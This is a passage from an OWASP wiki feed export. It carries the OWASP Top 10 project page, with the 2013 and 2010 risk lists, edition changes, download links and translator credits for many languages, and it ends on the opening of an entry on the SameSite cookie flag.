* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SameSite&amp;diff=235583</id>
		<title>SameSite</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SameSite&amp;diff=235583"/>
				<updated>2017-11-19T02:42:08Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: tweak grammar&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Overview ==&lt;br /&gt;
&lt;br /&gt;
SameSite prevents the browser from sending this cookie along with cross-site requests. The main goal is mitigate the risk of cross-origin information leakage. It also provides some protection against cross-site request forgery attacks. Possible values for the flag are &amp;lt;code&amp;gt;lax&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;strict&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
